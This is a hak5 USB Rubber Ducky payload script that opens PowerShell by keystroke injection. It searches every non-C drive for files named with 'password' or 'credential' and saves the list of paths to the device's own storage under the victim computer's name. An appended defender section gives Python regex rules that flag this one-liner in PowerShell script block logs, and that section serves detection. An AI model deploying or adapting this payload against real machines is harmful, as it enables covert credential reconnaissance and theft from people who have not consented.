GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/SecretFileList/payload.txt
REM Title: Secret File List
REM Description: This will list all files whose names contain "password" or "credential", excluding those on the C: drive. You can replace these keywords with your own search terms.
REM Author: ih-hira
REM Target: Windows
REM Version: 1.0
REM Category: Exfiltration

REM Define the drive label where you want to save the file. The default label is DUCKY. Rename your Pico drive to DUCKY for it to work properly. (optional)
DEFINE #DRIVE_LABEL DUCKY

REM Define your search term here. To search for multiple terms, separate them with a pipe (|).
DEFINE #SEARCH_TERM password|credential

ATTACKMODE HID STORAGE

DELAY 500
GUI r

DELAY 300
STRINGLN powershell

DELAY 1000
STRINGLN $m=(Get-Volume -FileSystemLabel #DRIVE_LABEL).DriveLetter; Get-PSDrive -PSProvider FileSystem | Where-Object Name -ne 'C' | ForEach-Object { Get-ChildItem ($_.Name + ':\') -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '#SEARCH_TERM' } | Select-Object -ExpandProperty FullName }>>$m':\'$env:computername'.txt'
STRINGLN exit

REM The drive letter of the volume labeled "DUCKY" is stored in the variable $m. You can change this by defining DRIVE_LABEL.
REM The scan takes time, because it walks every drive.
REM Keep in mind that the DUCKY drive has limited memory; if the file size exceeds the drive capacity, the file will not be saved.
REM The command output is redirected to a file in the root of the "DUCKY" drive, named after the computer (.txt).
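Added example for defenders, not part of the hak5 repository or the author's payload: a Python triage pass over PowerShell Script Block Logging records (event ID 4104) that flags script blocks combining the behaviours of the one-liner above. The signal names, threshold, hosts and sample records are constructed for illustration, and it assumes Script Block Logging is enabled on the endpoint.

```python
import re

# Behaviours the payload's PowerShell one-liner combines. Each is common on its
# own; several in a single script block is the pattern worth alerting on.
SIGNALS = {
    "volume_by_label": re.compile(r"Get-Volume\s+-FileSystemLabel\s+\S+", re.I),
    "all_fs_drives": re.compile(r"Get-PSDrive\s+-PSProvider\s+FileSystem", re.I),
    "recursive_listing": re.compile(r"Get-ChildItem\b[^|]*-Recurse", re.I),
    "keyword_name_match": re.compile(
        r"\.Name\s+-(?:match|like)\s+['\"][^'\"]*(?:passw|secret|credential)", re.I),
    "redirect_to_variable_drive": re.compile(r">>?\s*\$\w+\s*['\"]?:\\", re.I),
}

def score_script_block(text):
    """Return the sorted names of the signals found in one script block."""
    return sorted(name for name, rx in SIGNALS.items() if rx.search(text))

def triage(events, threshold=3):
    """Return (host, signals) for 4104 events showing at least `threshold` signals."""
    alerts = []
    for ev in events:
        if ev["event_id"] != 4104:  # only script block logging records
            continue
        hits = score_script_block(ev["script_block"])
        if len(hits) >= threshold:
            alerts.append((ev["host"], hits))
    return alerts

# Constructed sample records (hypothetical hosts); the first script block is the
# payload line above with its two DEFINE values substituted.
SAMPLE_EVENTS = [
    {"host": "WS-017", "event_id": 4104, "script_block":
        r"$m=(Get-Volume -FileSystemLabel DUCKY).DriveLetter; "
        r"Get-PSDrive -PSProvider FileSystem | Where-Object Name -ne 'C' | "
        r"ForEach-Object { Get-ChildItem ($_.Name + ':\') -Recurse "
        r"-ErrorAction SilentlyContinue | Where-Object { $_.Name -match "
        r"'password|credential' } | Select-Object -ExpandProperty FullName }"
        r">>$m':\'$env:computername'.txt'"},
    {"host": "WS-022", "event_id": 4104, "script_block":
        r"Get-ChildItem D:\Logs -Recurse | Where-Object Length -gt 1MB"},
    {"host": "SRV-03", "event_id": 4104, "script_block":
        r"$b=(Get-Volume -FileSystemLabel BACKUP).DriveLetter; "
        r"Copy-Item D:\Reports ($b + ':\Reports') -Recurse"},
    {"host": "WS-017", "event_id": 4103, "script_block": "Get-PSDrive"},
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

Requiring several signals together keeps routine recursive listings and backup scripts that look up a volume by label below the alert threshold.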